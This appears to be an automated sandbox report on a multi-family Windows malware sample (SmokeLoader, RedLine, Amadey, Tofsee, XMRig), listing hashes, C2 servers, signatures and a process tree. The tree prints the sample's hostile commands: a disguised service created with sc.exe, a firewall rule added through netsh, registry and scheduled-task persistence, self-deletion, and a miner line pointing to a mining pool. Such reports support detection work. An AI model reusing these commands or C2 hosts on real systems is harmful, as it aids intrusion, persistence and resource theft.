Overview

overview

10

Static

static

58c231de8d...07.exe

windows7_x64

10

58c231de8d...07.exe

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-12-2021 12:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107.exe

  • Size

    322KB

  • MD5

    e737b552b95983f93da575b47888ff9d

  • SHA1

    c484c58f9483a72f7fb94dd42c4d17d46fb9ae74

  • SHA256

    58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107

  • SHA512

    faa02f86c9e609b53c3d5717e0632aa04b984550f7bbaadfba3c8ab8d1ca739e5aff0cf617456243f6dee9ade78628750e8e5d6e1235a09f8fe297694ec3c60d

Score
10/10
amadeyarkeiredlinesmokeloadertofseexmrig1installbackdoorcollectiondiscoveryevasioninfostealerminerpersistencespywarestealertrojanvmprotect

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

1

C2

86.107.197.138:38133

Extracted

Family

redline

Botnet

install

C2

62.182.156.187:56323

Extracted

Family

amadey

Version

2.86

C2

185.215.113.35/d2VxjasuwS/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 2 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 44 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107.exe
    "C:\Users\Admin\AppData\Local\Temp\58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1880
    • C:\Users\Admin\AppData\Local\Temp\58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107.exe
      "C:\Users\Admin\AppData\Local\Temp\58c231de8df8a6742c8410650846b700a01436340e42833e5bb1c1f0ac3e5107.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1156
  • C:\Users\Admin\AppData\Local\Temp\A14E.exe
    C:\Users\Admin\AppData\Local\Temp\A14E.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1240
  • C:\Users\Admin\AppData\Local\Temp\F72C.exe
    C:\Users\Admin\AppData\Local\Temp\F72C.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Users\Admin\AppData\Local\Temp\F72C.exe
      C:\Users\Admin\AppData\Local\Temp\F72C.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2008
  • C:\Users\Admin\AppData\Local\Temp\6D6.exe
    C:\Users\Admin\AppData\Local\Temp\6D6.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:1200
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6D6.exe" & exit
      2⤵
        PID:2496
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 5
          3⤵
          • Delays execution with timeout.exe
          PID:2600
    • C:\Users\Admin\AppData\Local\Temp\F30.exe
      C:\Users\Admin\AppData\Local\Temp\F30.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dyzfhtic\
        2⤵
          PID:1192
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ldcrfrre.exe" C:\Windows\SysWOW64\dyzfhtic\
          2⤵
            PID:1920
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create dyzfhtic binPath= "C:\Windows\SysWOW64\dyzfhtic\ldcrfrre.exe /d\"C:\Users\Admin\AppData\Local\Temp\F30.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:1472
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description dyzfhtic "wifi internet conection"
              2⤵
                PID:1712
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start dyzfhtic
                2⤵
                  PID:552
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:1584
                • C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                  C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1528
                  • C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                    C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1904
                • C:\Users\Admin\AppData\Local\Temp\23B4.exe
                  C:\Users\Admin\AppData\Local\Temp\23B4.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1940
                  • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                    "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:1604
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                      3⤵
                        PID:1508
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                          4⤵
                            PID:1108
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe" /F
                          3⤵
                          • Creates scheduled task(s)
                          PID:964
                    • C:\Users\Admin\AppData\Local\Temp\2940.exe
                      C:\Users\Admin\AppData\Local\Temp\2940.exe
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:872
                      • C:\Users\Admin\AppData\Local\Temp\2940.exe
                        C:\Users\Admin\AppData\Local\Temp\2940.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1580
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                      • Accesses Microsoft Outlook profiles
                      • outlook_office_path
                      • outlook_win_path
                      PID:2040
                    • C:\Windows\SysWOW64\dyzfhtic\ldcrfrre.exe
                      C:\Windows\SysWOW64\dyzfhtic\ldcrfrre.exe /d"C:\Users\Admin\AppData\Local\Temp\F30.exe"
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1148
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:1792
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2716
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:1288
                      • C:\Users\Admin\AppData\Local\Temp\37F1.exe
                        C:\Users\Admin\AppData\Local\Temp\37F1.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1676
                        • C:\Windows\system32\cmd.exe
                          cmd /C C:\Users\Admin\AppData\Roaming\\counterstrike.exe
                          2⤵
                          • Loads dropped DLL
                          PID:1444
                          • C:\Users\Admin\AppData\Roaming\counterstrike.exe
                            C:\Users\Admin\AppData\Roaming\\counterstrike.exe
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:1172
                            • C:\Users\Admin\AppData\Local\Temp\leakless-34a05a9dc363ec03e25d5dcc5ff915d2\leakless.exe
                              C:\Users\Admin\AppData\Local\Temp\leakless-34a05a9dc363ec03e25d5dcc5ff915d2\leakless.exe 44bdf99bed433871d6b726e9e77d7cc0 127.0.0.1:49392 "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-dev-shm-usage --disable-prompt-on-repost --disable-renderer-backgrounding --disable-background-networking --disable-component-extensions-with-background-pages --no-startup-window --disable-ipc-flooding-protection --disable-hang-monitor --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --use-mock-keychain --disable-blink-features=AutomationControlled --mute-audio --disable-default-apps --disable-popup-blocking --force-color-profile=srgb --disable-background-timer-throttling --disable-breakpad --metrics-recording-only "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=0 --disable-features=site-per-process,TranslateUI --enable-automation --disable-sync --enable-features=NetworkService,NetworkServiceInProcess --no-first-run
                              4⤵
                              • Executes dropped EXE
                              PID:1120
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-dev-shm-usage --disable-prompt-on-repost --disable-renderer-backgrounding --disable-background-networking --disable-component-extensions-with-background-pages --no-startup-window --disable-ipc-flooding-protection --disable-hang-monitor --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --use-mock-keychain --disable-blink-features=AutomationControlled --mute-audio --disable-default-apps --disable-popup-blocking --force-color-profile=srgb --disable-background-timer-throttling --disable-breakpad --metrics-recording-only "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=0 --disable-features=site-per-process,TranslateUI --enable-automation --disable-sync --enable-features=NetworkService,NetworkServiceInProcess --no-first-run
                                5⤵
                                • Enumerates system info in registry
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:1340
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xe0,0x7fef6ad4f50,0x7fef6ad4f60,0x7fef6ad4f70
                                  6⤵
                                    PID:560
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --disable-breakpad --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1120 /prefetch:2
                                    6⤵
                                      PID:2052
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=1688 /prefetch:8
                                      6⤵
                                        PID:2120
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --disable-blink-features=AutomationControlled --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2296 /prefetch:1
                                        6⤵
                                          PID:2192
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --disable-breakpad --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2980 /prefetch:2
                                          6⤵
                                            PID:2332
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --disable-gpu-compositing --disable-blink-features=AutomationControlled --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3124 /prefetch:1
                                            6⤵
                                              PID:2504
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1100,1270465815191328484,3900396736519509871,131072 --enable-features=NetworkService,NetworkServiceInProcess --disable-features=TranslateUI,site-per-process --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=3592 /prefetch:8
                                              6⤵
                                                PID:2840
                                            • C:\Windows\system32\taskkill.exe
                                              taskkill /t /f /pid 1340
                                              5⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2980
                                    • C:\Users\Admin\AppData\Local\Temp\5CC5.exe
                                      C:\Users\Admin\AppData\Local\Temp\5CC5.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of SetThreadContext
                                      PID:1060
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        2⤵
                                          PID:684

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Initial Access

                                      Execution

                                      Scheduled Task

                                      1
                                      T1053

                                      Persistence

                                      New Service

                                      1
                                      T1050

                                      Modify Existing Service

                                      1
                                      T1031

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1060

                                      Scheduled Task

                                      1
                                      T1053

                                      Privilege Escalation

                                      New Service

                                      1
                                      T1050

                                      Scheduled Task

                                      1
                                      T1053

                                      Defense Evasion

                                      Disabling Security Tools

                                      1
                                      T1089

                                      Modify Registry

                                      2
                                      T1112

                                      Credential Access

                                      Credentials in Files

                                      2
                                      T1081

                                      Discovery

                                      Query Registry

                                      4
                                      T1012

                                      System Information Discovery

                                      4
                                      T1082

                                      Peripheral Device Discovery

                                      1
                                      T1120

                                      Lateral Movement

                                      Collection

                                      Data from Local System

                                      2
                                      T1005

                                      Email Collection

                                      1
                                      T1114

                                      Exfiltration

                                      Command and Control

                                      Impact

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                                        MD5

                                        224016e7d9a073ce240c6df108ba0ebb

                                        SHA1

                                        e5289609b29c0ab6b399e100c9f87fc39b29ac61

                                        SHA256

                                        9c55d8b1e171b21b41833dcbab1b07157f3bd3a12a06578c9063a211bb0bc61e

                                        SHA512

                                        a8f705f75dc0e1b98e22ecaa2995d763b1bbf231c5e0ad4a24390fde1ab6ebb27dc6aac3fcc27026090e90c98a96c47a39c9220e3d119f7072921b89a058e0fa

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                                        MD5

                                        224016e7d9a073ce240c6df108ba0ebb

                                        SHA1

                                        e5289609b29c0ab6b399e100c9f87fc39b29ac61

                                        SHA256

                                        9c55d8b1e171b21b41833dcbab1b07157f3bd3a12a06578c9063a211bb0bc61e

                                        SHA512

                                        a8f705f75dc0e1b98e22ecaa2995d763b1bbf231c5e0ad4a24390fde1ab6ebb27dc6aac3fcc27026090e90c98a96c47a39c9220e3d119f7072921b89a058e0fa

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\1A1A.exe
                                        MD5

                                        224016e7d9a073ce240c6df108ba0ebb

                                        SHA1

                                        e5289609b29c0ab6b399e100c9f87fc39b29ac61

                                        SHA256

                                        9c55d8b1e171b21b41833dcbab1b07157f3bd3a12a06578c9063a211bb0bc61e

                                        SHA512

                                        a8f705f75dc0e1b98e22ecaa2995d763b1bbf231c5e0ad4a24390fde1ab6ebb27dc6aac3fcc27026090e90c98a96c47a39c9220e3d119f7072921b89a058e0fa

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\23B4.exe
                                        MD5

                                        7d782bbbbd6cb54410caef8242537cab

                                        SHA1

                                        ca691b9fea276140b5c95cfea35329ecfd4c592b

                                        SHA256

                                        6960869ade53d02d2eb6c52826785aec6524c7be92c89f5dfbc83ac986b2b14b

                                        SHA512

                                        962e98d23c2e50ba2ed644314340af4c73cfe8b3eaaa904431500b21f936ccc8686c147a4ea66f507d72195e920c63ecc6d435a73f87922e4dd622e8cac036b4

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\23B4.exe
                                        MD5

                                        7d782bbbbd6cb54410caef8242537cab

                                        SHA1

                                        ca691b9fea276140b5c95cfea35329ecfd4c592b

                                        SHA256

                                        6960869ade53d02d2eb6c52826785aec6524c7be92c89f5dfbc83ac986b2b14b

                                        SHA512

                                        962e98d23c2e50ba2ed644314340af4c73cfe8b3eaaa904431500b21f936ccc8686c147a4ea66f507d72195e920c63ecc6d435a73f87922e4dd622e8cac036b4

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\2940.exe
                                        MD5

                                        f497ff63ca89d5513a63de1dc1bae58f

                                        SHA1

                                        ca6b819d4c0d27d5d737f2dc70109b87b6344bef

                                        SHA256

                                        ce9422ae9f6eb554748eaf832be6aced3f5ac556ed53734573c43a6e34198241

                                        SHA512

                                        6729da8220b548fa8b9d9f23ae39330a5dcb4ac22597121ce56dca6d433ac061502d6c270032135b321d6f4d79b4f0e7299efa961f8c7a3a49508be06cbab02a

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\2940.exe
                                        MD5

                                        f497ff63ca89d5513a63de1dc1bae58f

                                        SHA1

                                        ca6b819d4c0d27d5d737f2dc70109b87b6344bef

                                        SHA256

                                        ce9422ae9f6eb554748eaf832be6aced3f5ac556ed53734573c43a6e34198241

                                        SHA512

                                        6729da8220b548fa8b9d9f23ae39330a5dcb4ac22597121ce56dca6d433ac061502d6c270032135b321d6f4d79b4f0e7299efa961f8c7a3a49508be06cbab02a

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\2940.exe
                                        MD5

                                        f497ff63ca89d5513a63de1dc1bae58f

                                        SHA1

                                        ca6b819d4c0d27d5d737f2dc70109b87b6344bef

                                        SHA256

                                        ce9422ae9f6eb554748eaf832be6aced3f5ac556ed53734573c43a6e34198241

                                        SHA512

                                        6729da8220b548fa8b9d9f23ae39330a5dcb4ac22597121ce56dca6d433ac061502d6c270032135b321d6f4d79b4f0e7299efa961f8c7a3a49508be06cbab02a

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\37F1.exe
                                        MD5

                                        9f25eb870ee8a56eda7d35dc25f2241c

                                        SHA1

                                        7af117f07ca61a75baa2e4b183f980832b19f390

                                        SHA256

                                        53e95f5ab8f18a70baf702d59c2b308fb998de4cdc06d4d7d30c450e4cdfd4e3

                                        SHA512

                                        f39f4f99302cbcc3b0cd60a9899864ec9d2b84aa937ef1e07696043198d673908006e11cd40972bdfe0015112bc2310c03cc9467d0a2e523d5b1bc3858bd5eb2

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\55348629814811924809
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\5CC5.exe
                                        MD5

                                        2fe55f16da6348999312ef5ec21ae20d

                                        SHA1

                                        112bb1adce4ff9c427f61acbad6129794f8b213e

                                        SHA256

                                        f441a110f19b615e5c5fcf95ad57f96c418c2b5b3ad2565ff3863442457b422d

                                        SHA512

                                        12747dd0fb27ace42c58f9412099d8fb33e73a24a1c1a86ebab96c22aef9f11a32320b8eca61fa9197ec8476a358ef674e067151d163b2a96f92085cf3d72724

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\5CC5.exe
                                        MD5

                                        2fe55f16da6348999312ef5ec21ae20d

                                        SHA1

                                        112bb1adce4ff9c427f61acbad6129794f8b213e

                                        SHA256

                                        f441a110f19b615e5c5fcf95ad57f96c418c2b5b3ad2565ff3863442457b422d

                                        SHA512

                                        12747dd0fb27ace42c58f9412099d8fb33e73a24a1c1a86ebab96c22aef9f11a32320b8eca61fa9197ec8476a358ef674e067151d163b2a96f92085cf3d72724

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                                        MD5

                                        7d782bbbbd6cb54410caef8242537cab

                                        SHA1

                                        ca691b9fea276140b5c95cfea35329ecfd4c592b

                                        SHA256

                                        6960869ade53d02d2eb6c52826785aec6524c7be92c89f5dfbc83ac986b2b14b

                                        SHA512

                                        962e98d23c2e50ba2ed644314340af4c73cfe8b3eaaa904431500b21f936ccc8686c147a4ea66f507d72195e920c63ecc6d435a73f87922e4dd622e8cac036b4

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\6D6.exe
                                        MD5

                                        9f552053040a466fc3fd745e37ebe354

                                        SHA1

                                        e5b585661f55b2b8033fe2228df55c7ead070e01

                                        SHA256

                                        b97e66178aa10ab5b06531c7fb2fd36d7c94485367f6db3e94c969f40d8e6940

                                        SHA512

                                        a9811f4baafe97adbcb1dcc03a87796ede4be4db1b1fcfb23a33b5cefd6764da9257faa12ca4de811973e5acf4cba68d557095587aa2d807008ee161abc5de87

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\6D6.exe
                                        MD5

                                        9f552053040a466fc3fd745e37ebe354

                                        SHA1

                                        e5b585661f55b2b8033fe2228df55c7ead070e01

                                        SHA256

                                        b97e66178aa10ab5b06531c7fb2fd36d7c94485367f6db3e94c969f40d8e6940

                                        SHA512

                                        a9811f4baafe97adbcb1dcc03a87796ede4be4db1b1fcfb23a33b5cefd6764da9257faa12ca4de811973e5acf4cba68d557095587aa2d807008ee161abc5de87

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\A14E.exe
                                        MD5

                                        265ed6f79387305a37bd4a598403adf1

                                        SHA1

                                        c0647e1d4a77715a54141e4898bebcd322f3d9da

                                        SHA256

                                        1c10d4f9c74cbfb4478aa18e3430ea14c07da31ca819ffb8bea5d6e30218bff5

                                        SHA512

                                        1a7c615cab3ebe9910282b01bec5f5eb9558f40d716c4b0914e15d3d8b59e7d4bc37569575c8d9ba612613e1298f3f390d0bbaa153975f40ec262cea27b58b62

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\F30.exe
                                        MD5

                                        44d65948e693d217c38e2cca0be02e4d

                                        SHA1

                                        a8f1bffff003a591f0eb4264f3eeadf03b1f6594

                                        SHA256

                                        f817c83321640bfc088858c746e7829d53cbe9c1c5ad1e0d81615936a7a09596

                                        SHA512

                                        38af1832b26b36d242a3f61e502ad888bcb34bf3936dd6e1d61d302753e03e19882e1175b346ef6f35ccaf4c04390b5b527ae5de7666bf3c76d74834bc18b1f1

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\F30.exe
                                        MD5

                                        44d65948e693d217c38e2cca0be02e4d

                                        SHA1

